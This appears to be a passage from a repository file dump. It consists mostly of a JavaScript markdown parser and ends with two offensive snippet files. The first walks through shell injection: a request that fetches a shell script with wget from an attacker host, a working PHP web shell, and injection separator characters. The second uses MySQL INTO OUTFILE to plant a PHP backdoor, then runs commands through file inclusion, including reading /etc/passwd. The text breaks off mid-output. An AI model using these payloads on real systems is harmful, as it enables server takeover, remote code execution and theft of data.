*$/;\n        var TABLE_LEFT_ALIGN = /^ *:-+ *$/;\n\n        var parseTableAlignCapture = function (alignCapture) {\n            if (TABLE_RIGHT_ALIGN.test(alignCapture)) {\n                return \"right\";\n            } else if (TABLE_CENTER_ALIGN.test(alignCapture)) {\n                return \"center\";\n            } else if (TABLE_LEFT_ALIGN.test(alignCapture)) {\n                return \"left\";\n            } else {\n                return null;\n            }\n        };\n\n        var parseTableHeader = function (capture, parse, state) {\n            var headerText = capture[1]\n                .replace(TABLE_HEADER_TRIM, \"\")\n                .split(TABLE_ROW_SPLIT);\n            return headerText.map(function (text) {\n                return parse(text, state);\n            });\n        };\n\n        var parseTableAlign = function (capture, parse, state) {\n            var alignText = capture[2]\n                .replace(TABLE_ALIGN_TRIM, \"\")\n                .split(TABLE_ROW_SPLIT);\n\n            return alignText.map(parseTableAlignCapture);\n        };\n\n        var parseTableCells = function (capture, parse, state) {\n            var rowsText = capture[3]\n                .replace(TABLE_CELLS_TRIM, \"\")\n                .split(\"\\n\");\n\n            return rowsText.map(function (rowText) {\n                var cellText = rowText\n                    .replace(PLAIN_TABLE_ROW_TRIM, \"\")\n                    .split(TABLE_ROW_SPLIT);\n                return cellText.map(function (text) {\n                    return parse(text, state);\n                });\n            });\n        };\n\n        var parseNpTableCells = function (capture, parse, state) {\n            var rowsText = capture[3]\n                .replace(NPTABLE_CELLS_TRIM, \"\")\n                .split(\"\\n\");\n\n            return rowsText.map(function (rowText) {\n                var cellText = rowText.split(TABLE_ROW_SPLIT);\n                return cellText.map(function (text) {\n                    return parse(text, state);\n                });\n            });\n        };\n\n        var parseTable = function (capture, parse, state) {\n            state.inline = true;\n            var header = parseTableHeader(capture, parse, state);\n            var align = parseTableAlign(capture, parse, state);\n            var cells = parseTableCells(capture, parse, state);\n            state.inline = false;\n\n            return {\n                type: \"table\",\n                header: header,\n                align: align,\n                cells: cells\n            };\n        };\n\n        var parseNpTable = function (capture, parse, state) {\n            state.inline = true;\n            var header = parseTableHeader(capture, parse, state);\n            var align = parseTableAlign(capture, parse, state);\n            var cells = parseNpTableCells(capture, parse, state);\n            state.inline = false;\n\n            return {\n                type: \"table\",\n                header: header,\n                align: align,\n                cells: cells\n            };\n        };\n\n        return {\n            parseTable: parseTable,\n            parseNpTable: parseNpTable,\n            NPTABLE_REGEX: /^ *(\\S.*\\|.*)\\n *([-:]+ *\\|[-| :]*)\\n((?:.*\\|.*(?:\\n|$))*)\\n*/\n        };\n    })();\n\n    var LINK_INSIDE = \"(?:\\\\[[^\\\\]]*\\\\]|[^\\\\[\\\\]]|\\\\](?=[^\\\\[]*\\\\]))*\";\n    var LINK_HREF_AND_TITLE =\n        \"\\\\s*<?((?:[^\\\\s\\\\\\\\]|\\\\\\\\.)*?)>?(?:\\\\s+['\\\"]([\\\\s\\\\S]*?)['\\\"])?\\\\s*\";\n    var AUTOLINK_MAILTO_CHECK_R = /mailto:/i;\n\n    var parseRef = function (capture, state, refNode) {\n        var ref = (capture[2] || capture[1])\n            .replace(/\\s+/g, ' ')\n            .toLowerCase();\n\n        // We store information about previously seen defs on\n        // state._defs (_ to deconflict with client-defined\n        // state). If the def for this reflink/refimage has\n        // already been seen, we can use its target/source\n        // and title here:\n        if (state._defs && state._defs[ref]) {\n            var def = state._defs[ref];\n            // `refNode` can be a link or an image. Both use\n            // target and title properties.\n            refNode.target = def.target;\n            refNode.title = def.title;\n        }\n\n        // In case we haven't seen our def yet (or if someone\n        // overwrites that def later on), we add this node\n        // to the list of ref nodes for that def. Then, when\n        // we find the def, we can modify this link/image AST\n        // node :).\n        // I'm sorry.\n        state._refs = state._refs || {};\n        state._refs[ref] = state._refs[ref] || [];\n        state._refs[ref].push(refNode);\n\n        return refNode;\n    };\n\n    var defaultRules = {\n        heading: {\n            match: blockRegex(/^ *(#{1,6}) *([^\\n]+?) *#* *(?:\\n *)+\\n/),\n            parse: function (capture, parse, state) {\n                return {\n                    level: capture[1].length,\n                    content: parseInline(parse, capture[2], state)\n                };\n            },\n            react: function (node, output, state) {\n                return reactElement({\n                    type: 'h' + node.level,\n                    key: state.key,\n                    props: {\n                        children: output(node.content, state)\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null\n                });\n            },\n            html: function (node, output, state) {\n                return htmlTag(\"h\" + node.level, output(node.content, state));\n            }\n        },\n        nptable: {\n            match: blockRegex(TABLES.NPTABLE_REGEX),\n            // For perseus-markdown temporary backcompat:\n            regex: TABLES.NPTABLE_REGEX,\n            parse: TABLES.parseNpTable\n        },\n        lheading: {\n            match: blockRegex(/^([^\\n]+)\\n *(=|-){3,} *(?:\\n *)+\\n/),\n            parse: function (capture, parse, state) {\n                return {\n                    type: \"heading\",\n                    level: capture[2] === '=' ? 1 : 2,\n                    content: parseInline(parse, capture[1], state)\n                };\n            }\n        },\n        hr: {\n            match: blockRegex(/^( *[-*_]){3,} *(?:\\n *)+\\n/),\n            parse: ignoreCapture,\n            react: function (node, output, state) {\n                return reactElement({\n                    type: 'hr',\n                    key: state.key,\n                    props: EMPTY_PROPS,\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null,\n                });\n            },\n            html: function (node, output, state) {\n                return \"<hr>\";\n            }\n        },\n        codeBlock: {\n            match: blockRegex(/^(?:    [^\\n]+\\n*)+(?:\\n *)+\\n/),\n            parse: function (capture, parse, state) {\n                var content = capture[0]\n                    .replace(/^    /gm, '')\n                    .replace(/\\n+$/, '');\n                return {\n                    lang: undefined,\n                    content: content\n                };\n            },\n            react: function (node, output, state) {\n                var className = node.lang ?\n                    \"markdown-code-\" + node.lang :\n                    undefined;\n\n                return reactElement({\n                    type: 'pre',\n                    key: state.key,\n                    props: {\n                        children: reactElement({\n                            type: 'code',\n                            props: {\n                                className: className,\n                                children: node.content\n                            },\n                            $$typeof: TYPE_SYMBOL,\n                            _store: null\n                        })\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null\n                });\n            },\n            html: function (node, output, state) {\n                var className = node.lang ?\n                    \"markdown-code-\" + node.lang :\n                    undefined;\n\n                var codeBlock = htmlTag(\"code\", node.content, {\n                    class: className\n                });\n                return htmlTag(\"pre\", codeBlock);\n            }\n        },\n        fence: {\n            match: blockRegex(/^ *(`{3,}|~{3,}) *(\\S+)? *\\n([\\s\\S]+?)\\s*\\1 *(?:\\n *)+\\n/),\n            parse: function (capture, parse, state) {\n                return {\n                    type: \"codeBlock\",\n                    lang: capture[2] || undefined,\n                    content: capture[3]\n                };\n            }\n        },\n        blockQuote: {\n            match: blockRegex(/^( *>[^\\n]+(\\n[^\\n]+)*\\n*)+\\n{2,}/),\n            parse: function (capture, parse, state) {\n                var content = capture[0].replace(/^ *> ?/gm, '');\n                return {\n                    content: parse(content, state)\n                };\n            },\n            react: function (node, output, state) {\n                return reactElement({\n                    type: 'blockquote',\n                    key: state.key,\n                    props: {\n                        children: output(node.content, state)\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null\n                });\n            },\n            html: function (node, output, state) {\n                return htmlTag(\"blockquote\", output(node.content, state));\n            }\n        },\n        list: {\n            match: function (source, state, prevCapture) {\n                // We only want to break into a list if we are at the start of a\n                // line. This is to avoid parsing \"hi * there\" with \"* there\"\n                // becoming a part of a list.\n                // You might wonder, \"but that's inline, so of course it wouldn't\n                // start a list?\". You would be correct! Except that some of our\n                // lists can be inline, because they might be inside another list,\n                // in which case we can parse with inline scope, but need to allow\n                // nested lists inside this inline scope.\n                var isStartOfLine = LIST_LOOKBEHIND_R.test(prevCapture);\n                var isListBlock = state._list || !state.inline;\n\n                if (isStartOfLine && isListBlock) {\n                    return LIST_R.exec(source);\n                } else {\n                    return null;\n                }\n            },\n            parse: function (capture, parse, state) {\n                var bullet = capture[2];\n                var ordered = bullet.length > 1;\n                var start = ordered ? +bullet : undefined;\n                var items = capture[0]\n                    .replace(LIST_BLOCK_END_R, \"\\n\")\n                    .match(LIST_ITEM_R);\n\n                var lastItemWasAParagraph = false;\n                var itemContent = items.map(function (item, i) {\n                    // We need to see how far indented this item is:\n                    var space = LIST_ITEM_PREFIX_R.exec(item)[0].length;\n                    // And then we construct a regex to \"unindent\" the subsequent\n                    // lines of the items by that amount:\n                    var spaceRegex = new RegExp(\"^ {1,\" + space + \"}\", \"gm\");\n\n                    // Before processing the item, we need a couple things\n                    var content = item\n                        // remove indents on trailing lines:\n                        .replace(spaceRegex, '')\n                        // remove the bullet:\n                        .replace(LIST_ITEM_PREFIX_R, '');\n\n                    // Handling \"loose\" lists, like:\n                    //\n                    //  * this is wrapped in a paragraph\n                    //\n                    //  * as is this\n                    //\n                    //  * as is this\n                    var isLastItem = (i === items.length - 1);\n                    var containsBlocks = content.indexOf(\"\\n\\n\") !== -1;\n\n                    // Any element in a list is a block if it contains multiple\n                    // newlines. The last element in the list can also be a block\n                    // if the previous item in the list was a block (this is\n                    // because non-last items in the list can end with \\n\\n, but\n                    // the last item can't, so we just \"inherit\" this property\n                    // from our previous element).\n                    var thisItemIsAParagraph = containsBlocks ||\n                        (isLastItem && lastItemWasAParagraph);\n                    lastItemWasAParagraph = thisItemIsAParagraph;\n\n                    // backup our state for restoration afterwards. We're going to\n                    // want to set state._list to true, and state.inline depending\n                    // on our list's looseness.\n                    var oldStateInline = state.inline;\n                    var oldStateList = state._list;\n                    state._list = true;\n\n                    // Parse inline if we're in a tight list, or block if we're in\n                    // a loose list.\n                    var adjustedContent;\n                    if (thisItemIsAParagraph) {\n                        state.inline = false;\n                        adjustedContent = content.replace(LIST_ITEM_END_R, \"\\n\\n\");\n                    } else {\n                        state.inline = true;\n                        adjustedContent = content.replace(LIST_ITEM_END_R, \"\");\n                    }\n\n                    var result = parse(adjustedContent, state);\n\n                    // Restore our state before returning\n                    state.inline = oldStateInline;\n                    state._list = oldStateList;\n                    return result;\n                });\n\n                return {\n                    ordered: ordered,\n                    start: start,\n                    items: itemContent\n                };\n            },\n            react: function (node, output, state) {\n                var ListWrapper = node.ordered ? \"ol\" : \"ul\";\n\n                return reactElement({\n                    type: ListWrapper,\n                    key: state.key,\n                    props: {\n                        start: node.start,\n                        children: node.items.map(function (item, i) {\n                            return reactElement({\n                                type: 'li',\n                                key: i,\n                                props: {\n                                    children: output(item, state)\n                                },\n                                $$typeof: TYPE_SYMBOL,\n                                _store: null,\n                            });\n                        })\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null,\n                });\n            },\n            html: function (node, output, state) {\n                var listItems = node.items.map(function (item) {\n                    return htmlTag(\"li\", output(item, state));\n                }).join(\"\");\n\n                var listTag = node.ordered ? \"ol\" : \"ul\";\n                var attributes = {\n                    start: node.start\n                };\n                return htmlTag(listTag, listItems, attributes);\n            }\n        },\n        def: {\n            // TODO(aria): This will match without a blank line before the next\n            // block element, which is inconsistent with most of the rest of\n            // simple-markdown.\n            match: blockRegex(\n                /^ *\\[([^\\]]+)\\]: *<?([^\\s>]*)>?(?: +[\"(]([^\\n]+)[\")])? *\\n(?: *\\n)?/\n            ),\n            parse: function (capture, parse, state) {\n                var def = capture[1]\n                    .replace(/\\s+/g, ' ')\n                    .toLowerCase();\n                var target = capture[2];\n                var title = capture[3];\n\n                // Look for previous links/images using this def\n                // If any links/images using this def have already been declared,\n                // they will have added themselves to the state._refs[def] list\n                // (_ to deconflict with client-defined state). We look through\n                // that list of reflinks for this def, and modify those AST nodes\n                // with our newly found information now.\n                // Sorry :(.\n                if (state._refs && state._refs[def]) {\n                    // `refNode` can be a link or an image\n                    state._refs[def].forEach(function (refNode) {\n                        refNode.target = target;\n                        refNode.title = title;\n                    });\n                }\n\n                // Add this def to our map of defs for any future links/images\n                // In case we haven't found any or all of the refs referring to\n                // this def yet, we add our def to the table of known defs, so\n                // that future reflinks can modify themselves appropriately with\n                // this information.\n                state._defs = state._defs || {};\n                state._defs[def] = {\n                    target: target,\n                    title: title,\n                };\n\n                // return the relevant parsed information\n                // for debugging only.\n                return {\n                    def: def,\n                    target: target,\n                    title: title,\n                };\n            },\n            react: function () { return null; },\n            html: function () { return null; }\n        },\n        table: {\n            match: blockRegex(/^ *\\|(.+)\\n *\\|( *[-:]+[-| :]*)\\n((?: *\\|.*(?:\\n|$))*)\\n*/),\n            parse: TABLES.parseTable,\n            react: function (node, output, state) {\n                var getStyle = function (colIndex) {\n                    return node.align[colIndex] == null ? {} : {\n                        textAlign: node.align[colIndex]\n                    };\n                };\n\n                var headers = node.header.map(function (content, i) {\n                    return reactElement({\n                        type: 'th',\n                        key: i,\n                        props: {\n                            style: getStyle(i),\n                            scope: 'col',\n                            children: output(content, state)\n                        },\n                        $$typeof: TYPE_SYMBOL,\n                        _store: null\n                    });\n                });\n\n                var rows = node.cells.map(function (row, r) {\n                    return reactElement({\n                        type: 'tr',\n                        key: r,\n                        props: {\n                            children: row.map(function (content, c) {\n                                return reactElement({\n                                    type: 'td',\n                                    key: c,\n                                    props: {\n                                        style: getStyle(c),\n                                        children: output(content, state)\n                                    },\n                                    $$typeof: TYPE_SYMBOL,\n                                    _store: null,\n                                });\n                            })\n                        },\n                        $$typeof: TYPE_SYMBOL,\n                        _store: null,\n                    });\n                });\n\n                return reactElement({\n                    type: 'table',\n                    key: state.key,\n                    props: {\n                        children: [reactElement({\n                            type: 'thead',\n                            key: 'thead',\n                            props: {\n                                children: reactElement({\n                                    type: 'tr',\n                                    props: {\n                                        children: headers\n                                    },\n                                    $$typeof: TYPE_SYMBOL,\n                                    _store: null,\n                                })\n                            },\n                            $$typeof: TYPE_SYMBOL,\n                            _store: null,\n                        }), reactElement({\n                            type: 'tbody',\n                            key: 'tbody',\n                            props: {\n                                children: rows\n                            },\n                            $$typeof: TYPE_SYMBOL,\n                            _store: null,\n                        })]\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null,\n                });\n            },\n            html: function (node, output, state) {\n                var getStyle = function (colIndex) {\n                    return node.align[colIndex] == null ? \"\" :\n                        \"text-align:\" + node.align[colIndex] + \";\";\n                };\n\n                var headers = node.header.map(function (content, i) {\n                    return htmlTag(\"th\", output(content, state),\n                        { style: getStyle(i), scope: \"col\" });\n                }).join(\"\");\n\n                var rows = node.cells.map(function (row) {\n                    var cols = row.map(function (content, c) {\n                        return htmlTag(\"td\", output(content, state),\n                            { style: getStyle(c) });\n                    }).join(\"\");\n\n                    return htmlTag(\"tr\", cols);\n                }).join(\"\");\n\n                var thead = htmlTag(\"thead\", htmlTag(\"tr\", headers));\n                var tbody = htmlTag(\"tbody\", rows);\n\n                return htmlTag(\"table\", thead + tbody);\n            }\n        },\n        newline: {\n            match: blockRegex(/^(?:\\n *)*\\n/),\n            parse: ignoreCapture,\n            react: function (node, output, state) { return \"\\n\"; },\n            html: function (node, output, state) { return \"\\n\"; }\n        },\n        paragraph: {\n            match: blockRegex(/^((?:[^\\n]|\\n(?! *\\n))+)(?:\\n *)+\\n/),\n            parse: parseCaptureInline,\n            react: function (node, output, state) {\n                return reactElement({\n                    type: 'div',\n                    key: state.key,\n                    props: {\n                        className: 'paragraph',\n                        children: output(node.content, state)\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null,\n                });\n            },\n            html: function (node, output, state) {\n                var attributes = {\n                    class: 'paragraph'\n                };\n                return htmlTag(\"div\", output(node.content, state), attributes);\n            }\n        },\n        escape: {\n            // We don't allow escaping numbers, letters, or spaces here so that\n            // backslashes used in plain text still get rendered. But allowing\n            // escaping anything else provides a very flexible escape mechanism,\n            // regardless of how this grammar is extended.\n            match: inlineRegex(/^\\\\([^0-9A-Za-z\\s])/),\n            parse: function (capture, parse, state) {\n                return {\n                    type: \"text\",\n                    content: capture[1]\n                };\n            }\n        },\n        autolink: {\n            match: inlineRegex(/^<([^ >]+:\\/[^ >]+)>/),\n            parse: function (capture, parse, state) {\n                return {\n                    type: \"link\",\n                    content: [{\n                        type: \"text\",\n                        content: capture[1]\n                    }],\n                    target: capture[1]\n                };\n            }\n        },\n        mailto: {\n            match: inlineRegex(/^<([^ >]+@[^ >]+)>/),\n            parse: function (capture, parse, state) {\n                var address = capture[1];\n                var target = capture[1];\n\n                // Check for a `mailto:` already existing in the link:\n                if (!AUTOLINK_MAILTO_CHECK_R.test(target)) {\n                    target = \"mailto:\" + target;\n                }\n\n                return {\n                    type: \"link\",\n                    content: [{\n                        type: \"text\",\n                        content: address\n                    }],\n                    target: target\n                };\n            }\n        },\n        url: {\n            match: inlineRegex(/^(https?:\\/\\/[^\\s<]+[^<.,:;\"')\\]\\s])/),\n            parse: function (capture, parse, state) {\n                return {\n                    type: \"link\",\n                    content: [{\n                        type: \"text\",\n                        content: capture[1]\n                    }],\n                    target: capture[1],\n                    title: undefined\n                };\n            }\n        },\n        link: {\n            match: inlineRegex(new RegExp(\n                \"^\\\\[(\" + LINK_INSIDE + \")\\\\]\\\\(\" + LINK_HREF_AND_TITLE + \"\\\\)\"\n            )),\n            parse: function (capture, parse, state) {\n                var link = {\n                    content: parse(capture[1], state),\n                    target: unescapeUrl(capture[2]),\n                    title: capture[3]\n                };\n                return link;\n            },\n            react: function (node, output, state) {\n                return reactElement({\n                    type: 'a',\n                    key: state.key,\n                    props: {\n                        href: sanitizeUrl(node.target),\n                        title: node.title,\n                        children: output(node.content, state)\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null,\n                });\n            },\n            html: function (node, output, state) {\n                var attributes = {\n                    href: sanitizeUrl(node.target),\n                    title: node.title\n                };\n\n                return htmlTag(\"a\", output(node.content, state), attributes);\n            }\n        },\n        image: {\n            match: inlineRegex(new RegExp(\n                \"^!\\\\[(\" + LINK_INSIDE + \")\\\\]\\\\(\" + LINK_HREF_AND_TITLE + \"\\\\)\"\n            )),\n            parse: function (capture, parse, state) {\n                var image = {\n                    alt: capture[1],\n                    target: unescapeUrl(capture[2]),\n                    title: capture[3]\n                };\n                return image;\n            },\n            react: function (node, output, state) {\n                return reactElement({\n                    type: 'img',\n                    key: state.key,\n                    props: {\n                        src: sanitizeUrl(node.target),\n                        alt: node.alt,\n                        title: node.title\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null,\n                });\n            },\n            html: function (node, output, state) {\n                var attributes = {\n                    src: sanitizeUrl(node.target),\n                    alt: node.alt,\n                    title: node.title\n                };\n\n                return htmlTag(\"img\", \"\", attributes, false);\n            }\n        },\n        reflink: {\n            match: inlineRegex(new RegExp(\n                // The first [part] of the link\n                \"^\\\\[(\" + LINK_INSIDE + \")\\\\]\" +\n                // The [ref] target of the link\n                \"\\\\s*\\\\[([^\\\\]]*)\\\\]\"\n            )),\n            parse: function (capture, parse, state) {\n                return parseRef(capture, state, {\n                    type: \"link\",\n                    content: parse(capture[1], state)\n                });\n            }\n        },\n        refimage: {\n            match: inlineRegex(new RegExp(\n                // The first [part] of the link\n                \"^!\\\\[(\" + LINK_INSIDE + \")\\\\]\" +\n                // The [ref] target of the link\n                \"\\\\s*\\\\[([^\\\\]]*)\\\\]\"\n            )),\n            parse: function (capture, parse, state) {\n                return parseRef(capture, state, {\n                    type: \"image\",\n                    alt: capture[1]\n                });\n            }\n        },\n        em: {\n            match: inlineRegex(\n                new RegExp(\n                    // only match _s surrounding words.\n                    \"^\\\\b_\" +\n                    \"((?:__|\\\\\\\\[\\\\s\\\\S]|[^\\\\\\\\_])+?)_\" +\n                    \"\\\\b\" +\n                    // Or match *s:\n                    \"|\" +\n                    // Only match *s that are followed by a non-space:\n                    \"^\\\\*(?=\\\\S)(\" +\n                    // Match at least one of:\n                    //  - `**`: so that bolds inside italics don't close the\n                    //          italics\n                    //  - whitespace: followed by a non-* (we don't\n                    //          want ' *' to close an italics--it might\n                    //          start a list)\n                    //  - non-whitespace, non-* characters\n                    \"(?:\\\\*\\\\*|\\\\s+(?:[^\\\\*\\\\s]|\\\\*\\\\*)|[^\\\\s\\\\*])+?\" +\n                    // followed by a non-space, non-* then *\n                    \")\\\\*(?!\\\\*)\"\n                )\n            ),\n            quality: function (capture) {\n                // precedence by length, `em` wins ties:\n                return capture[0].length + 0.2;\n            },\n            parse: function (capture, parse, state) {\n                return {\n                    content: parse(capture[2] || capture[1], state)\n                };\n            },\n            react: function (node, output, state) {\n                return reactElement({\n                    type: 'em',\n                    key: state.key,\n                    props: {\n                        children: output(node.content, state)\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null,\n                });\n            },\n            html: function (node, output, state) {\n                return htmlTag(\"em\", output(node.content, state));\n            }\n        },\n        strong: {\n            match: inlineRegex(/^\\*\\*([\\s\\S]+?)\\*\\*(?!\\*)/),\n            quality: function (capture) {\n                // precedence by length, wins ties vs `u`:\n                return capture[0].length + 0.1;\n            },\n            parse: parseCaptureInline,\n            react: function (node, output, state) {\n                return reactElement({\n                    type: 'strong',\n                    key: state.key,\n                    props: {\n                        children: output(node.content, state)\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null,\n                });\n            },\n            html: function (node, output, state) {\n                return htmlTag(\"strong\", output(node.content, state));\n            }\n        },\n        u: {\n            match: inlineRegex(/^__([\\s\\S]+?)__(?!_)/),\n            quality: function (capture) {\n                // precedence by length, loses all ties\n                return capture[0].length;\n            },\n            parse: parseCaptureInline,\n            react: function (node, output, state) {\n                return reactElement({\n                    type: 'u',\n                    key: state.key,\n                    props: {\n                        children: output(node.content, state)\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null,\n                });\n            },\n            html: function (node, output, state) {\n                return htmlTag(\"u\", output(node.content, state));\n            }\n        },\n        del: {\n            match: inlineRegex(/^~~(?=\\S)([\\s\\S]*?\\S)~~/),\n            parse: parseCaptureInline,\n            react: function (node, output, state) {\n                return reactElement({\n                    type: 'del',\n                    key: state.key,\n                    props: {\n                        children: output(node.content, state)\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null,\n                });\n            },\n            html: function (node, output, state) {\n                return htmlTag(\"del\", output(node.content, state));\n            }\n        },\n        inlineCode: {\n            match: inlineRegex(/^(`+)\\s*([\\s\\S]*?[^`])\\s*\\1(?!`)/),\n            parse: function (capture, parse, state) {\n                return {\n                    content: capture[2]\n                };\n            },\n            react: function (node, output, state) {\n                return reactElement({\n                    type: 'code',\n                    key: state.key,\n                    props: {\n                        children: node.content\n                    },\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null,\n                });\n            },\n            html: function (node, output, state) {\n                return htmlTag(\"code\", node.content);\n            }\n        },\n        br: {\n            match: anyScopeRegex(/^ {2,}\\n/),\n            parse: ignoreCapture,\n            react: function (node, output, state) {\n                return reactElement({\n                    type: 'br',\n                    key: state.key,\n                    props: EMPTY_PROPS,\n                    $$typeof: TYPE_SYMBOL,\n                    _store: null,\n                });\n            },\n            html: function (node, output, state) {\n                return \"<br>\";\n            }\n        },\n        text: {\n            // Here we look for anything followed by non-symbols,\n            // double newlines, or double-space-newlines\n            // We break on any symbol characters so that this grammar\n            // is easy to extend without needing to modify this regex\n            match: inlineRegex(\n                /^[\\s\\S]+?(?=[^0-9A-Za-z\\s\\u00c0-\\uffff]|\\n\\n| {2,}\\n|\\w+:\\S|$)/\n            ),\n            parse: function (capture, parse, state) {\n                return {\n                    content: capture[0]\n                };\n            },\n            react: function (node, output, state) {\n                return node.content;\n            },\n            html: function (node, output, state) {\n                return node.content;\n            }\n        }\n    };\n\n    Object.keys(defaultRules).forEach(function (type, i) {\n        defaultRules[type].order = i;\n    });\n\n    // Make strong, em, and u parse at the same level, competing with each other\n    // on capture length\n    defaultRules.strong.order = defaultRules.em.order = defaultRules.u.order;\n\n    var ruleOutput = function (rules, property) {\n        if (!property && typeof console !== \"undefined\") {\n            console.warn(\"simple-markdown ruleOutput should take 'react' or \" +\n                \"'html' as the second argument.\"\n            );\n        }\n\n        // deprecated:\n        property = property || \"react\";\n\n        var nestedRuleOutput = function (ast, outputFunc, state) {\n            return rules[ast.type][property](ast, outputFunc, state);\n        };\n        return nestedRuleOutput;\n    };\n\n    var defaultRawParse = parserFor(defaultRules);\n    var defaultBlockParse = function (source) {\n        return defaultRawParse(source + \"\\n\\n\", {\n            inline: false\n        });\n    };\n    var defaultInlineParse = function (source) {\n        return defaultRawParse(source, {\n            inline: true\n        });\n    };\n    var defaultImplicitParse = function (source) {\n        return defaultRawParse(source, {\n            inline: !(BLOCK_END_R.test(source))\n        });\n    };\n\n    var defaultReactOutput = reactFor(ruleOutput(defaultRules, \"react\"));\n    var defaultHtmlOutput = htmlFor(ruleOutput(defaultRules, \"html\"));\n\n    var SimpleMarkdown = {\n        defaultRules: defaultRules,\n        parserFor: parserFor,\n        ruleOutput: ruleOutput,\n        reactFor: reactFor,\n        htmlFor: htmlFor,\n\n        inlineRegex: inlineRegex,\n        blockRegex: blockRegex,\n        anyScopeRegex: anyScopeRegex,\n        parseInline: parseInline,\n        parseBlock: parseBlock,\n\n        defaultRawParse: defaultRawParse,\n        defaultBlockParse: defaultBlockParse,\n        defaultInlineParse: defaultInlineParse,\n        defaultImplicitParse: defaultImplicitParse,\n\n        defaultReactOutput: defaultReactOutput,\n        defaultHtmlOutput: defaultHtmlOutput,\n\n        preprocess: preprocess,\n        sanitizeUrl: sanitizeUrl,\n        unescapeUrl: unescapeUrl,\n\n        // deprecated:\n        defaultParse: defaultImplicitParse,\n        outputFor: reactFor,\n        defaultOutput: defaultReactOutput,\n    };\n\n    if (typeof module !== \"undefined\" && module.exports) {\n        module.exports = SimpleMarkdown;\n    } else if (typeof global !== \"undefined\") {\n        global.SimpleMarkdown = SimpleMarkdown;\n    } else {\n        window.SimpleMarkdown = SimpleMarkdown;\n    }\n\n})();\n"
  },
  {
    "path": "snippets/from_shell_injection_to_root.txt",
    "content": "1. Find Shell Injection/OS Command Execution vulnerability \n\n\nShell injection is generally considered one of the most dangerous vulnerabilities because it can be used to gain complete control over a target server. Although server and OS hardening can help to limit the impact and make it harder for an attacker to escalate privileges, there is still significant risk. Privilege escalation usually takes the following path:\n\n- Find Shell injection vulnerability. Leverage the vulnerability to gain further shell access by creating a custom shell script accessible to the attacker. This can take many forms, most simply a new, dedicated PHP page which acts as a shell. By default, this shell will have the same access as the user running the web server, usually Apache or IIS.\n- Once shell access is established, the attacker can monitor processes for additional attack landscapes. A good target might be a database user connection, which allows SQL injection attacks directly against the database, and may allow the attacker to gain control of the database user as well, using SQL Injection to create setuid files owned by the database owner with global read privileges.\n- From this point, it is a matter of an attacker finding other vulnerabilities on the server and exploiting them to gain additional privileges. Whether this is finding unprotected setuid to root or exploiting known software bugs, it is only a matter of time before the attacker has complete control of the system.\n(http://www.golemtechnologies.com/articles/shell-injection)\n\n2. Upload shell (example)\nexample1.php is a vulnerable script. 'ip' GET parameter can be malicious with arbitrary OS command\n\n192.168.1.6 - victim server\n192.168.1.3 - attacker server\n\n- get shell script from remote server\nhttp://192.168.1.6/commandexec/example1.php?ip=127.0.0.1;cd%20../;wget%20http://192.168.1.3/myshell.txt\n\n- rename it to .php script\nhttp://192.168.1.6/commandexec/example1.php?ip=127.0.0.1;cd%20../;cp%20myshell.txt%20myshell.php\n\n- using it:\nhttp://192.168.1.6/myshell.php?c=\n\n\n3. myshell.php\n\n<form action=\"\" method=\"get\"><textarea name=\"c\" rows=\"10\" cols=\"80\"><?php if (isset($_GET['c'])) {echo $_GET['c'];}?></textarea><button type=\"submit\">go</button></form><hr /><div><p>Result of <strong><?php if(isset($_GET['c'])){echo $_GET['c'];}?></strong></p><pre><?php $output=\"\";if (isset($_GET['c'])){$output=@system($_GET['c']);};?></pre></div>\n\n\n4. Special signs using in OS command injections:\n\n&\n&&\n;\n|\n||\n%0a (new line)\n\n\n"
  },
  {
    "path": "snippets/mysql_loadintooutfile_backdoor.txt",
    "content": "################################################################################\n#####\t\t\t\t\t\t\t\t\t########\n#####\t\tHow to use MySQL `LOAD INTO OUTFILE' (backdoor)\t\t########\n#####\t\t\t\t\t\t\t\t\t########\n#####\t\tTwitter: @_bl4de | \t\t\t\t\t########\n#####\t\t\t\t\t\t\t\t\t########\n################################################################################\n\nrequires:\n- vulnreable server\n- writable /tmp on this server\n- Local File Inclusion i WebApp on Apache server\n- access to MySQL, for examle by remote root login (CVE 2012-2122), \npwned phpMyAdmin or SQLi in WebApp.\n\n--------------------------------------------------------------------------------\n\n1. After succesful access to MySQL:\n\nSELECT \"<?php echo '<br />ShellExec backdoor<br />'; echo '<pre>'\n.shell_exec($_GET['cmd']).'</pre>'; ?>\" INTO OUTFILE \"/tmp/backdoor.php\";\n\n--------------------------------------------------------------------------------\n\n2. This will create file /tmp/backdoor.php\n\n--------------------------------------------------------------------------------\n\n3. In affected (LFI) WebApp:\n\nhttp://vulnsite.com/index.php?vulnparam=/tmp/backdoor.php&cmd='ls -l'\n\n--------------------------------------------------------------------------------\n\n4. In web browser result should be similar to:\n\n(...)\ntotal 8\n-rw-rw-r-- 1 rafal rafal  316 Dec  4 11:14 index.php\ndrwxrwxr-x 3 rafal rafal 4096 Nov 15 12:23 nbproject\n\n(...)\n\n\n--------------------------------------------------------------------------------\n\n5. Now, we can do anything, that web server group/username can do :)\n\n--------------------------------------------------------------------------------\n\n6. Creating new folders and files:\n\nnew dir:\n\nhttp://vulnsite.com/index.php?vulnparam=mkdir /var/www/newdir\n\nnew file in previously created dir:\n\nhttp://vulnsite.com/index.php?vulnparam=\n/tmp/backdoor.php&cmd=echo \"<?php echo 'test'; ?>\" > /var/www/newdir/test.php\n\n--------------------------------------------------------------------------------\n\n7. Display any readable file:\n\nhttp://vulnsite.com/index.php?vulnparam=cat /etc/passwd  (classic :) )\n\n--------------------------------------------------------------------------------\n\n8. using tools like ping, traceroute:\n\nhttp://vulnsite.com/index.php?vulnparam=ping -c 2 www.google.com\n\n(...)\n\nPING www.google.com (46.28.247.113) 56(84) bytes of data.\n64 bytes from 46.28.247.113: 